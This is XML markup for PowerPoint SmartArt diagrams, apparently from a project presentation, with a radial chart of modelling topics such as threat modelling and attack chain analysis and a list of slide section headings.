    <dgm:pt modelId="{B45AABFD-001B-4D48-AD8F-58A64ED0EC8D}" type="sibTrans" cxnId="{87D4AA3A-DFE4-433D-9D02-C67D5246489D}">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custLinFactNeighborX="6620" custLinFactNeighborY="4504">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custLinFactNeighborX="0" custLinFactNeighborY="-24138">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7FCD2-FBCC-47F5-8CD4-278006F3A1E6}"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IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Modelling</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C86AFC5-7611-47FE-B8C4-E78C96DF52B6}" type="parTrans" cxnId="{3D649B18-A6AA-4350-BBB6-42036B794137}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C72C8158-7A68-4AFE-9B76-CDF235EDF543}" type="sibTrans" cxnId="{3D649B18-A6AA-4350-BBB6-42036B794137}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{529BA064-8A14-417D-9C2E-513CD52E7A7A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Threat modelling</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3A48273-7BF9-4C08-BB8A-2818B3C79A45}" type="parTrans" cxnId="{47B241D9-B360-4328-BE0E-F8AE25E48BE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F3506C3-746A-4022-A7CC-0640F5F33718}" type="sibTrans" cxnId="{47B241D9-B360-4328-BE0E-F8AE25E48BE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFAFE971-FF3D-4284-A010-3601C45E8679}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Attack chain analysis</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35178E40-7BB4-463D-A142-38B1077E7760}" type="parTrans" cxnId="{A9ADB2AE-7D0A-482A-B75E-B9764B7124DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D4735F93-3D20-4C89-9120-BF852D522B8D}" type="sibTrans" cxnId="{A9ADB2AE-7D0A-482A-B75E-B9764B7124DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1F8DEE7-EBF9-43B2-ACFD-45977DAA7E54}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Behavioural modelling</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19B73195-ABC6-4153-8199-BB92B37B65FD}" type="parTrans" cxnId="{052A85B4-939C-4C5C-90C1-7416F38E0717}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E17F4D23-D7E6-4A8D-935C-33A1FFC2E66E}" type="sibTrans" cxnId="{052A85B4-939C-4C5C-90C1-7416F38E0717}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B4984854-91F9-499E-A0E6-4515630C1F35}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Network traffic analysis</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8F04168-69B3-4152-B3B5-ABF90F198AE8}" type="parTrans" cxnId="{F0CC1F04-392E-47F9-AF49-C711E21B4296}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F263904-B61C-478B-BC01-6A27E378E824}" type="sibTrans" cxnId="{F0CC1F04-392E-47F9-AF49-C711E21B4296}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42154C70-C048-47B1-8467-979C72E9807D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Scenario modelling</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54E7164C-745E-4CD3-AF31-DF679FE20073}" type="parTrans" cxnId="{AB554B97-B185-4555-B4EF-EFA06AECB6C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99D41AAF-1D5E-4C3B-9DA7-55D1C0D4F094}" type="sibTrans" cxnId="{AB554B97-B185-4555-B4EF-EFA06AECB6C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F701800-F720-4AE4-BDD0-BE9B51BAB031}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Risk assessment</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB6FD486-F8EF-4B2E-AA29-538330FFA43A}" type="parTrans" cxnId="{3E039A57-7D41-48FC-A3AF-BEAC17602434}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7DE6BAC-D8F0-472A-B74D-2B7CFB5E5AAF}" type="sibTrans" cxnId="{3E039A57-7D41-48FC-A3AF-BEAC17602434}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{82359961-515B-423B-8594-BF135EE35BBB}" type="pres">
      <dgm:prSet presAssocID="{3AE7FCD2-FBCC-47F5-8CD4-278006F3A1E6}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" type="pres">
      <dgm:prSet presAssocID="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" presName="singleCycle" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E8971404-EF73-4A6D-9EAE-1F4F778E3C9D}" type="pres">
      <dgm:prSet presAssocID="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" presName="singleCenter" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7" custScaleX="132755" custScaleY="59680">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DA583868-6DD2-44F6-855A-A89772E52EC8}" type="pres">
      <dgm:prSet presAssocID="{E3A48273-7BF9-4C08-BB8A-2818B3C79A45}" presName="Name56" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0F8186B-2B8D-44C3-8AE3-F31931274D54}" type="pres">
      <dgm:prSet presAssocID="{529BA064-8A14-417D-9C2E-513CD52E7A7A}" presName="text0" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7" custScaleX="163769">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B02D8259-CDC0-47D3-A863-C8774AA360BA}" type="pres">
      <dgm:prSet presAssocID="{35178E40-7BB4-463D-A142-38B1077E7760}" presName="Name56" presStyleLbl="parChTrans1D2" presStyleIdx="1" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CDE399BE-B206-4F07-B505-EA114E8709C1}" type="pres">
      <dgm:prSet presAssocID="{FFAFE971-FF3D-4284-A010-3601C45E8679}" presName="text0" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7" custScaleX="204146" custRadScaleRad="140849" custRadScaleInc="15671">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F63DAE2A-CEE0-4F00-B8C0-372D6A837670}" type="pres">
      <dgm:prSet presAssocID="{19B73195-ABC6-4153-8199-BB92B37B65FD}" presName="Name56" presStyleLbl="parChTrans1D2" presStyleIdx="2" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D445F25F-DA15-4F88-8741-0BA693E99B42}" type="pres">
      <dgm:prSet presAssocID="{C1F8DEE7-EBF9-43B2-ACFD-45977DAA7E54}" presName="text0" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7" custScaleX="196884" custRadScaleRad="116510" custRadScaleInc="-34009">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E05F3E78-0E8B-4B4B-B2FD-55CE37D794F8}" type="pres">
      <dgm:prSet presAssocID="{CB6FD486-F8EF-4B2E-AA29-538330FFA43A}" presName="Name56" presStyleLbl="parChTrans1D2" presStyleIdx="3" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0837CD28-FC83-4DC0-BF2D-E597C22BBFE3}" type="pres">
      <dgm:prSet presAssocID="{8F701800-F720-4AE4-BDD0-BE9B51BAB031}" presName="text0" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="7" custScaleX="247991">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E5184D91-0271-4994-9CE3-FE5CD5499900}" type="pres">
      <dgm:prSet presAssocID="{C8F04168-69B3-4152-B3B5-ABF90F198AE8}" presName="Name56" presStyleLbl="parChTrans1D2" presStyleIdx="4" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35E58558-683E-4BCF-BFD6-C928B467795F}" type="pres">
      <dgm:prSet presAssocID="{B4984854-91F9-499E-A0E6-4515630C1F35}" presName="text0" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="7" custScaleX="169412" custRadScaleRad="129768" custRadScaleInc="47996">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E32A33EE-A661-49C7-BF3E-8A1F45288B12}" type="pres">
      <dgm:prSet presAssocID="{54E7164C-745E-4CD3-AF31-DF679FE20073}" presName="Name56" presStyleLbl="parChTrans1D2" presStyleIdx="5" presStyleCnt="6"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D88EAF0-925D-49B0-9672-70230676BA6C}" type="pres">
      <dgm:prSet presAssocID="{42154C70-C048-47B1-8467-979C72E9807D}" presName="text0" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="7" custScaleX="169558" custRadScaleRad="135484" custRadScaleInc="-3988">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F0CC1F04-392E-47F9-AF49-C711E21B4296}" srcId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" destId="{B4984854-91F9-499E-A0E6-4515630C1F35}" srcOrd="4" destOrd="0" parTransId="{C8F04168-69B3-4152-B3B5-ABF90F198AE8}" sibTransId="{3F263904-B61C-478B-BC01-6A27E378E824}"/>
    <dgm:cxn modelId="{4501CC04-1422-4E1F-9C39-BB70A6AC1DD4}" type="presOf" srcId="{54E7164C-745E-4CD3-AF31-DF679FE20073}" destId="{E32A33EE-A661-49C7-BF3E-8A1F45288B12}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{1C137209-1631-4C5B-98D6-4F49231B6E70}" type="presOf" srcId="{E3A48273-7BF9-4C08-BB8A-2818B3C79A45}" destId="{DA583868-6DD2-44F6-855A-A89772E52EC8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{13132717-BF85-4F26-812E-99130C9BF818}" type="presOf" srcId="{CB6FD486-F8EF-4B2E-AA29-538330FFA43A}" destId="{E05F3E78-0E8B-4B4B-B2FD-55CE37D794F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{3D649B18-A6AA-4350-BBB6-42036B794137}" srcId="{3AE7FCD2-FBCC-47F5-8CD4-278006F3A1E6}" destId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" srcOrd="0" destOrd="0" parTransId="{3C86AFC5-7611-47FE-B8C4-E78C96DF52B6}" sibTransId="{C72C8158-7A68-4AFE-9B76-CDF235EDF543}"/>
    <dgm:cxn modelId="{E34C7C24-4544-4D15-B4C3-DC8C41569FC3}" type="presOf" srcId="{C8F04168-69B3-4152-B3B5-ABF90F198AE8}" destId="{E5184D91-0271-4994-9CE3-FE5CD5499900}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{23A1FC30-D59E-453F-BFBA-D7DE45EE4961}" type="presOf" srcId="{3AE7FCD2-FBCC-47F5-8CD4-278006F3A1E6}" destId="{82359961-515B-423B-8594-BF135EE35BBB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{C6939369-F6E2-4D39-A695-617A61C7954F}" type="presOf" srcId="{19B73195-ABC6-4153-8199-BB92B37B65FD}" destId="{F63DAE2A-CEE0-4F00-B8C0-372D6A837670}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{008F0055-E8C7-40EB-9C99-810FC844F126}" type="presOf" srcId="{C1F8DEE7-EBF9-43B2-ACFD-45977DAA7E54}" destId="{D445F25F-DA15-4F88-8741-0BA693E99B42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{50142B56-DE84-4EA3-8B63-CC4065748C5B}" type="presOf" srcId="{35178E40-7BB4-463D-A142-38B1077E7760}" destId="{B02D8259-CDC0-47D3-A863-C8774AA360BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{3E039A57-7D41-48FC-A3AF-BEAC17602434}" srcId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" destId="{8F701800-F720-4AE4-BDD0-BE9B51BAB031}" srcOrd="3" destOrd="0" parTransId="{CB6FD486-F8EF-4B2E-AA29-538330FFA43A}" sibTransId="{C7DE6BAC-D8F0-472A-B74D-2B7CFB5E5AAF}"/>
    <dgm:cxn modelId="{F9937F85-B26F-4F89-B66B-06B8622641AF}" type="presOf" srcId="{42154C70-C048-47B1-8467-979C72E9807D}" destId="{7D88EAF0-925D-49B0-9672-70230676BA6C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{AB554B97-B185-4555-B4EF-EFA06AECB6C3}" srcId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" destId="{42154C70-C048-47B1-8467-979C72E9807D}" srcOrd="5" destOrd="0" parTransId="{54E7164C-745E-4CD3-AF31-DF679FE20073}" sibTransId="{99D41AAF-1D5E-4C3B-9DA7-55D1C0D4F094}"/>
    <dgm:cxn modelId="{A9ADB2AE-7D0A-482A-B75E-B9764B7124DF}" srcId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" destId="{FFAFE971-FF3D-4284-A010-3601C45E8679}" srcOrd="1" destOrd="0" parTransId="{35178E40-7BB4-463D-A142-38B1077E7760}" sibTransId="{D4735F93-3D20-4C89-9120-BF852D522B8D}"/>
    <dgm:cxn modelId="{A21A79B3-D388-41A5-ADA1-FEF674C4F3F5}" type="presOf" srcId="{B4984854-91F9-499E-A0E6-4515630C1F35}" destId="{35E58558-683E-4BCF-BFD6-C928B467795F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{052A85B4-939C-4C5C-90C1-7416F38E0717}" srcId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" destId="{C1F8DEE7-EBF9-43B2-ACFD-45977DAA7E54}" srcOrd="2" destOrd="0" parTransId="{19B73195-ABC6-4153-8199-BB92B37B65FD}" sibTransId="{E17F4D23-D7E6-4A8D-935C-33A1FFC2E66E}"/>
    <dgm:cxn modelId="{86FB5CC7-4F61-4BD4-96B7-2F139D446158}" type="presOf" srcId="{8F701800-F720-4AE4-BDD0-BE9B51BAB031}" destId="{0837CD28-FC83-4DC0-BF2D-E597C22BBFE3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{33D35FC8-2EFA-4A09-A616-C0071A14863B}" type="presOf" srcId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" destId="{E8971404-EF73-4A6D-9EAE-1F4F778E3C9D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{B5A99ECC-5BC1-4A17-AA86-1BF7F69E2193}" type="presOf" srcId="{529BA064-8A14-417D-9C2E-513CD52E7A7A}" destId="{F0F8186B-2B8D-44C3-8AE3-F31931274D54}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{47B241D9-B360-4328-BE0E-F8AE25E48BE3}" srcId="{405C9721-4B05-4DCE-AB24-19AC52C66A87}" destId="{529BA064-8A14-417D-9C2E-513CD52E7A7A}" srcOrd="0" destOrd="0" parTransId="{E3A48273-7BF9-4C08-BB8A-2818B3C79A45}" sibTransId="{0F3506C3-746A-4022-A7CC-0640F5F33718}"/>
    <dgm:cxn modelId="{77F30BEB-5C05-422B-B1ED-508FEB8924CD}" type="presOf" srcId="{FFAFE971-FF3D-4284-A010-3601C45E8679}" destId="{CDE399BE-B206-4F07-B505-EA114E8709C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{1D25660D-D5E7-4409-83DF-E4DA45F0543E}" type="presParOf" srcId="{82359961-515B-423B-8594-BF135EE35BBB}" destId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{F04C3F03-681A-4EFE-8683-65B9B78B4770}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{E8971404-EF73-4A6D-9EAE-1F4F778E3C9D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{5F49A777-F541-4855-8E41-768CEE37F9D2}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{DA583868-6DD2-44F6-855A-A89772E52EC8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{E5D7D15D-83FA-4BC7-8196-BD0729592EA4}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{F0F8186B-2B8D-44C3-8AE3-F31931274D54}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{1DAFD3E4-642B-494B-A654-7F9547F5A5FD}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{B02D8259-CDC0-47D3-A863-C8774AA360BA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{F56388ED-1467-4A83-851F-032F6853688A}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{CDE399BE-B206-4F07-B505-EA114E8709C1}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{49D1DBF2-DB07-4D49-A020-109E8A8E1B28}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{F63DAE2A-CEE0-4F00-B8C0-372D6A837670}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{838CBA99-6A69-4706-8781-FF105E04BD46}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{D445F25F-DA15-4F88-8741-0BA693E99B42}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{043AC2EF-0A9A-4E27-93F7-F642605FD557}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{E05F3E78-0E8B-4B4B-B2FD-55CE37D794F8}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{1A128522-C1B9-4E69-A14D-15F27CDCB08D}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{0837CD28-FC83-4DC0-BF2D-E597C22BBFE3}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{BDA272C8-B691-4D23-9330-F7E1F7D70DC5}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{E5184D91-0271-4994-9CE3-FE5CD5499900}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{0B0D3EF1-A24E-437A-B980-46C551E7A188}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{35E58558-683E-4BCF-BFD6-C928B467795F}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{04BE98C4-53C1-4996-810A-5F727EB8A2C1}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{E32A33EE-A661-49C7-BF3E-8A1F45288B12}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/RadialCluster"/>
    <dgm:cxn modelId="{DC3837D4-3925-4784-A9C7-6DDA775EB3A4}" type="presParOf" srcId="{0FB6714B-C9EA-4477-AF40-54B085E7B74F}" destId="{7D88EAF0-925D-49B0-9672-70230676BA6C}" srcOrd="12"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201121"/>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482877" y="9241"/>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Problem statement</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="501611" y="27975"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4E3FA896-3C96-4E8C-8520-DEF6B3F51C64}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="790801"/>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482877" y="598921"/>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Project overview</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="501611" y="617655"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E8242749-3559-43B1-B4DE-0F9212422515}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1380481"/>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14844" y="1205886"/>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Who are the end users</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="533578" y="1224620"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{496E6517-4980-4EC9-A396-32CBD0797034}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1953217"/>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482877" y="1778282"/>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Solution and its value</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="501611" y="1797016"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2D769025-E9E3-40C6-BD44-075BFB578E82}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2559842"/>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482877" y="2367962"/>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Modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="501611" y="2386696"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FED8AE8F-0AFF-42F9-B0B8-8CE702CB0969}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3149522"/>
          <a:ext cx="9657556" cy="32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482877" y="2957642"/>
          <a:ext cx="6760289" cy="383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5523" tIns="0" rIns="255523" bIns="0" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="577850">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
